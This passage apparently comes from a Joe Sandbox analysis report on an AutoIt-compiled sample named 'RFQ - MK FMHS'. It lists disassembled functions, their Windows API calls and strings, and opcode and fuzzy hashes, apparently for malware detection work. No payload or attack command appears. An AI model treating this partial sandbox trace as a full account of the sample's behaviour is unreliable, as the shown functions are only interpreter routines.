                    • GetClientRect.USER32(00000000,?), ref: 00EE7952
                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00EE7996
                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00EE79A5
                    • GetStockObject.GDI32(00000011), ref: 00EE79B5
                    • SelectObject.GDI32(00000000,00000000), ref: 00EE79B9
                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00EE79C9
                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00EE79D2
                    • DeleteDC.GDI32(00000000), ref: 00EE79DB
                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00EE7A07
                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 00EE7A1E
                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00EE7A59
                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00EE7A6D
                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 00EE7A7E
                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00EE7AAE
                    • GetStockObject.GDI32(00000011), ref: 00EE7AB9
                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00EE7AC4
                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00EE7ACE
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                    • API String ID: 2910397461-517079104
                    • Opcode ID: c8c225c74f6de7e9d673556e62a53c50ff7d1a0d3abf94e709a99ebcde22e81b
                    • Instruction ID: 11188ea79987b3c9c9a048a3d9f32d6325611d48c9dcde3c899a4c7671fd876c
                    • Opcode Fuzzy Hash: c8c225c74f6de7e9d673556e62a53c50ff7d1a0d3abf94e709a99ebcde22e81b
                    • Instruction Fuzzy Hash: DEA15E71A40219BFEB149BA5DC4AFABBBA9EF44714F018114FA15F72E1CB70AD00CB64
                    Function 00EDAF7B Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                    Download Yara Rule
                    APIs
                    • SetErrorMode.KERNEL32(00000001), ref: 00EDAF89
                    • GetDriveTypeW.KERNEL32(?,00EFFAC0,?,\\.\,00EFF910), ref: 00EDB066
                    • SetErrorMode.KERNEL32(00000000,00EFFAC0,?,\\.\,00EFF910), ref: 00EDB1C4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: ErrorMode$DriveType
                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                    • API String ID: 2907320926-4222207086
                    • Opcode ID: 3cb6ea0ff5fdd1988078eea63d38b3f5b312325f7476ee487d7d7c9fc84532af
                    • Instruction ID: 65a78e193a0ee5258c96033ad28b8c2ceec99dda9b43869f9894141a9691071e
                    • Opcode Fuzzy Hash: 3cb6ea0ff5fdd1988078eea63d38b3f5b312325f7476ee487d7d7c9fc84532af
                    • Instruction Fuzzy Hash: 82519C30681305EB8B04DB10D9A29BD73B1EF54745B22A027E41AB7391E775DD43EB47
                    Function 00E76A3C Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: __wcsnicmp
                    • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                    • API String ID: 1038674560-86951937
                    • Opcode ID: 6a61c3aed55eba3de6ae97f5a24414a8f1ea8fbf9b894335966114f4d973c12b
                    • Instruction ID: c7fd92bc4d8ac36823d0af26b9473712d7ef930e4998d25e30f5cb65a04d9c33
                    • Opcode Fuzzy Hash: 6a61c3aed55eba3de6ae97f5a24414a8f1ea8fbf9b894335966114f4d973c12b
                    • Instruction Fuzzy Hash: 50812B71600705BBCF21AF70CC82FAE77D8AF16708F04A025FD49BA1C6EB61EA55D261
                    Function 00EFAB60 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetSysColor.USER32(00000012), ref: 00EFAB99
                    • SetTextColor.GDI32(?,?), ref: 00EFAB9D
                    • GetSysColorBrush.USER32(0000000F), ref: 00EFABB3
                    • GetSysColor.USER32(0000000F), ref: 00EFABBE
                    • CreateSolidBrush.GDI32(?), ref: 00EFABC3
                    • GetSysColor.USER32(00000011), ref: 00EFABDB
                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00EFABE9
                    • SelectObject.GDI32(?,00000000), ref: 00EFABFA
                    • SetBkColor.GDI32(?,00000000), ref: 00EFAC03
                    • SelectObject.GDI32(?,?), ref: 00EFAC10
                    • InflateRect.USER32(?,000000FF,000000FF), ref: 00EFAC2F
                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00EFAC46
                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00EFAC5B
                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00EFACA7
                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00EFACCE
                    • InflateRect.USER32(?,000000FD,000000FD), ref: 00EFACEC
                    • DrawFocusRect.USER32(?,?), ref: 00EFACF7
                    • GetSysColor.USER32(00000011), ref: 00EFAD05
                    • SetTextColor.GDI32(?,00000000), ref: 00EFAD0D
                    • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00EFAD21
                    • SelectObject.GDI32(?,00EFA869), ref: 00EFAD38
                    • DeleteObject.GDI32(?), ref: 00EFAD43
                    • SelectObject.GDI32(?,?), ref: 00EFAD49
                    • DeleteObject.GDI32(?), ref: 00EFAD4E
                    • SetTextColor.GDI32(?,?), ref: 00EFAD54
                    • SetBkColor.GDI32(?,?), ref: 00EFAD5E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                    • String ID:
                    • API String ID: 1996641542-0
                    • Opcode ID: 205a858a4d932cc4d9b89a0503ba7221c867ed707eab564916b1344e128ccbc1
                    • Instruction ID: daf9e7b45ee292a82ba342a2daffc1cdd2a262fc7e16d8ef3b5c99373a402248
                    • Opcode Fuzzy Hash: 205a858a4d932cc4d9b89a0503ba7221c867ed707eab564916b1344e128ccbc1
                    • Instruction Fuzzy Hash: FC616EB1901218EFDF119FA5DC48EBEBB79EF48320F148125FA15BB2A1D6719D40DB90
                    Function 00EF8C44 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00EF8D34
                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00EF8D45
                    • CharNextW.USER32(0000014E), ref: 00EF8D74
                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00EF8DB5
                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00EF8DCB
                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00EF8DDC
                    • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00EF8DF9
                    • SetWindowTextW.USER32(?,0000014E), ref: 00EF8E45
                    • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00EF8E5B
                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00EF8E8C
                    • _memset.LIBCMT ref: 00EF8EB1
                    • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00EF8EFA
                    • _memset.LIBCMT ref: 00EF8F59
                    • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00EF8F83
                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 00EF8FDB
                    • SendMessageW.USER32(?,0000133D,?,?), ref: 00EF9088
                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00EF90AA
                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00EF90F4
                    • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00EF9121
                    • DrawMenuBar.USER32(?), ref: 00EF9130
                    • SetWindowTextW.USER32(?,0000014E), ref: 00EF9158
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                    • String ID: 0
                    • API String ID: 1073566785-4108050209
                    • Opcode ID: 803425c68880f4f47d5fded9432d8a889f318ba720fe44cc27e80ee4681c49d5
                    • Instruction ID: 9676690ef859ff45c91d83c71706d0cb78c2f5396f17de96a927db989e492d2b
                    • Opcode Fuzzy Hash: 803425c68880f4f47d5fded9432d8a889f318ba720fe44cc27e80ee4681c49d5
                    • Instruction Fuzzy Hash: A7E19D7090120DAEDF209F61CC88AFE7BB9EF05714F109169FA55BA291DB308A85DF61
                    Function 00EF4B16 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetCursorPos.USER32(?), ref: 00EF4C51
                    • GetDesktopWindow.USER32 ref: 00EF4C66
                    • GetWindowRect.USER32(00000000), ref: 00EF4C6D
                    • GetWindowLongW.USER32(?,000000F0), ref: 00EF4CCF
                    • DestroyWindow.USER32(?), ref: 00EF4CFB
                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00EF4D24
                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00EF4D42
                    • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00EF4D68
                    • SendMessageW.USER32(?,00000421,?,?), ref: 00EF4D7D
                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00EF4D90
                    • IsWindowVisible.USER32(?), ref: 00EF4DB0
                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00EF4DCB
                    • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00EF4DDF
                    • GetWindowRect.USER32(?,?), ref: 00EF4DF7
                    • MonitorFromPoint.USER32(?,?,00000002), ref: 00EF4E1D
                    • GetMonitorInfoW.USER32(00000000,?), ref: 00EF4E37
                    • CopyRect.USER32(?,?), ref: 00EF4E4E
                    • SendMessageW.USER32(?,00000412,00000000), ref: 00EF4EB9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                    • String ID: ($0$tooltips_class32
                    • API String ID: 698492251-4156429822
                    • Opcode ID: 6d221cffd18bae13fb9488f8d5c48890f1f502a1329783c79a7bc84febae8884
                    • Instruction ID: d9171acf5ac6430cb090adca834e38910d727419ecc10c1ef21943dedf05ca75
                    • Opcode Fuzzy Hash: 6d221cffd18bae13fb9488f8d5c48890f1f502a1329783c79a7bc84febae8884
                    • Instruction Fuzzy Hash: 69B148B1604341AFDB04DF65C844B6BBBE4FF88314F009918F699AB2A2DB71EC04CB91
                    Function 00E727D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                    Download Yara Rule
                    APIs
                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00E728BC
                    • GetSystemMetrics.USER32(00000007), ref: 00E728C4
                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00E728EF
                    • GetSystemMetrics.USER32(00000008), ref: 00E728F7
                    • GetSystemMetrics.USER32(00000004), ref: 00E7291C
                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00E72939
                    • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00E72949
                    • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00E7297C
                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00E72990
                    • GetClientRect.USER32(00000000,000000FF), ref: 00E729AE
                    • GetStockObject.GDI32(00000011), ref: 00E729CA
                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 00E729D5
                      • Part of subcall function 00E72344: GetCursorPos.USER32(?), ref: 00E72357
                      • Part of subcall function 00E72344: ScreenToClient.USER32(00F367B0,?), ref: 00E72374
                      • Part of subcall function 00E72344: GetAsyncKeyState.USER32(00000001), ref: 00E72399
                      • Part of subcall function 00E72344: GetAsyncKeyState.USER32(00000002), ref: 00E723A7
                    • SetTimer.USER32(00000000,00000000,00000028,00E71256), ref: 00E729FC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                    • String ID: AutoIt v3 GUI
                    • API String ID: 1458621304-248962490
                    • Opcode ID: 03c088a7d77ec4bc8e18595130ca2e3249d4a0410def54d7b05610dc376e9500
                    • Instruction ID: 82fe4ee1aae3f970e5d8a38019094f3db95f63f353acedb7fdc44cffdb1321b6
                    • Opcode Fuzzy Hash: 03c088a7d77ec4bc8e18595130ca2e3249d4a0410def54d7b05610dc376e9500
                    • Instruction Fuzzy Hash: A1B16C71A0020AAFDB14DFA8DC45BAE7BB5FF48315F109129FA19FA290DB70A845DB50
                    Function 00EF4069 Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON
                    Download Yara Rule
                    APIs
                    • CharUpperBuffW.USER32(?,?), ref: 00EF40F6
                    • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00EF41B6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: BuffCharMessageSendUpper
                    • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                    • API String ID: 3974292440-719923060
                    • Opcode ID: 7f298dde55d50aee78a829e11612ddb58b5a8718bf1daa25809b1671c137ae8c
                    • Instruction ID: a5ce7e4331400c08f8f110a435a68124e3dbf38f5f22c5869780f9c1bdccfe34
                    • Opcode Fuzzy Hash: 7f298dde55d50aee78a829e11612ddb58b5a8718bf1daa25809b1671c137ae8c
                    • Instruction Fuzzy Hash: 70A17B702142199FCB14EF24C951A7AB3E5AF84314F14A96DB99ABB3D3DB30ED06CB41
                    Function 00EE52F0 Relevance: 27.1, APIs: 18, Instructions: 124COMMON
                    Download Yara Rule
                    APIs
                    • LoadCursorW.USER32(00000000,00007F89), ref: 00EE5309
                    • LoadCursorW.USER32(00000000,00007F8A), ref: 00EE5314
                    • LoadCursorW.USER32(00000000,00007F00), ref: 00EE531F
                    • LoadCursorW.USER32(00000000,00007F03), ref: 00EE532A
                    • LoadCursorW.USER32(00000000,00007F8B), ref: 00EE5335
                    • LoadCursorW.USER32(00000000,00007F01), ref: 00EE5340
                    • LoadCursorW.USER32(00000000,00007F81), ref: 00EE534B
                    • LoadCursorW.USER32(00000000,00007F88), ref: 00EE5356
                    • LoadCursorW.USER32(00000000,00007F80), ref: 00EE5361
                    • LoadCursorW.USER32(00000000,00007F86), ref: 00EE536C
                    • LoadCursorW.USER32(00000000,00007F83), ref: 00EE5377
                    • LoadCursorW.USER32(00000000,00007F85), ref: 00EE5382
                    • LoadCursorW.USER32(00000000,00007F82), ref: 00EE538D
                    • LoadCursorW.USER32(00000000,00007F84), ref: 00EE5398
                    • LoadCursorW.USER32(00000000,00007F04), ref: 00EE53A3
                    • LoadCursorW.USER32(00000000,00007F02), ref: 00EE53AE
                    • GetCursorInfo.USER32(?), ref: 00EE53BE
                    • GetLastError.KERNEL32(00000001,00000000), ref: 00EE53E9
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Cursor$Load$ErrorInfoLast
                    • String ID:
                    • API String ID: 3215588206-0
                    • Opcode ID: efc16af5d3db369b1bf9cca5056f67eafdb35b655f38c2621dd201fc49044775
                    • Instruction ID: 400fe3bd36d7739c28be7c585744d6d372f0bcd29b4577273a9b062102e9f8f9
                    • Opcode Fuzzy Hash: efc16af5d3db369b1bf9cca5056f67eafdb35b655f38c2621dd201fc49044775
                    • Instruction Fuzzy Hash: BE416071E043196ADB109FBA8C49D6EFEF8EF91B10F10452FE519E7291DAB8A401CE61
                    Function 00ECAA64 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                    Download Yara Rule
                    APIs
                    • GetClassNameW.USER32(?,?,00000100), ref: 00ECAAA5
                    • __swprintf.LIBCMT ref: 00ECAB46
                    • _wcscmp.LIBCMT ref: 00ECAB59
                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00ECABAE
                    • _wcscmp.LIBCMT ref: 00ECABEA
                    • GetClassNameW.USER32(?,?,00000400), ref: 00ECAC21
                    • GetDlgCtrlID.USER32(?), ref: 00ECAC73
                    • GetWindowRect.USER32(?,?), ref: 00ECACA9
                    • GetParent.USER32(?), ref: 00ECACC7
                    • ScreenToClient.USER32(00000000), ref: 00ECACCE
                    • GetClassNameW.USER32(?,?,00000100), ref: 00ECAD48
                    • _wcscmp.LIBCMT ref: 00ECAD5C
                    • GetWindowTextW.USER32(?,?,00000400), ref: 00ECAD82
                    • _wcscmp.LIBCMT ref: 00ECAD96
                      • Part of subcall function 00E9386C: _iswctype.LIBCMT ref: 00E93874
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                    • String ID: %s%u
                    • API String ID: 3744389584-679674701
                    • Opcode ID: f2f9bcea87f6b709b46bee472c394b37a0db9b3b8d17c3a83527c297fbfbc8ab
                    • Instruction ID: 528855467fb0f243759e6b51a12d2e6cc73c109ec021fda1b3d5c3cee3f70204
                    • Opcode Fuzzy Hash: f2f9bcea87f6b709b46bee472c394b37a0db9b3b8d17c3a83527c297fbfbc8ab
                    • Instruction Fuzzy Hash: ADA1B07120420AAFD714DE20C984FEAFBE8FF4431DF04552DF99AE2190DB31A946CB92
                    Function 00ECB397 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                    Download Yara Rule
                    APIs
                    • GetClassNameW.USER32(00000008,?,00000400), ref: 00ECB3DB
                    • _wcscmp.LIBCMT ref: 00ECB3EC
                    • GetWindowTextW.USER32(00000001,?,00000400), ref: 00ECB414
                    • CharUpperBuffW.USER32(?,00000000), ref: 00ECB431
                    • _wcscmp.LIBCMT ref: 00ECB44F
                    • _wcsstr.LIBCMT ref: 00ECB460
                    • GetClassNameW.USER32(00000018,?,00000400), ref: 00ECB498
                    • _wcscmp.LIBCMT ref: 00ECB4A8
                    • GetWindowTextW.USER32(00000002,?,00000400), ref: 00ECB4CF
                    • GetClassNameW.USER32(00000018,?,00000400), ref: 00ECB518
                    • _wcscmp.LIBCMT ref: 00ECB528
                    • GetClassNameW.USER32(00000010,?,00000400), ref: 00ECB550
                    • GetWindowRect.USER32(00000004,?), ref: 00ECB5B9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                    • String ID: @$ThumbnailClass
                    • API String ID: 1788623398-1539354611
                    • Opcode ID: f458421cd2b0c7cf0f5b885b911b059fe3c9bffa9e45a86689c0ec83fc7431ab
                    • Instruction ID: 7d6b44e0e0238f02c9fe563d80644321cb9651267ed67690a6af42d38f63089b
                    • Opcode Fuzzy Hash: f458421cd2b0c7cf0f5b885b911b059fe3c9bffa9e45a86689c0ec83fc7431ab
                    • Instruction Fuzzy Hash: 6C8180710083059FDB14DF14CA86FAA77E8EF44318F04A56DFD89AA092EB35DD4ACB61
                    Function 00ECB1E0 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
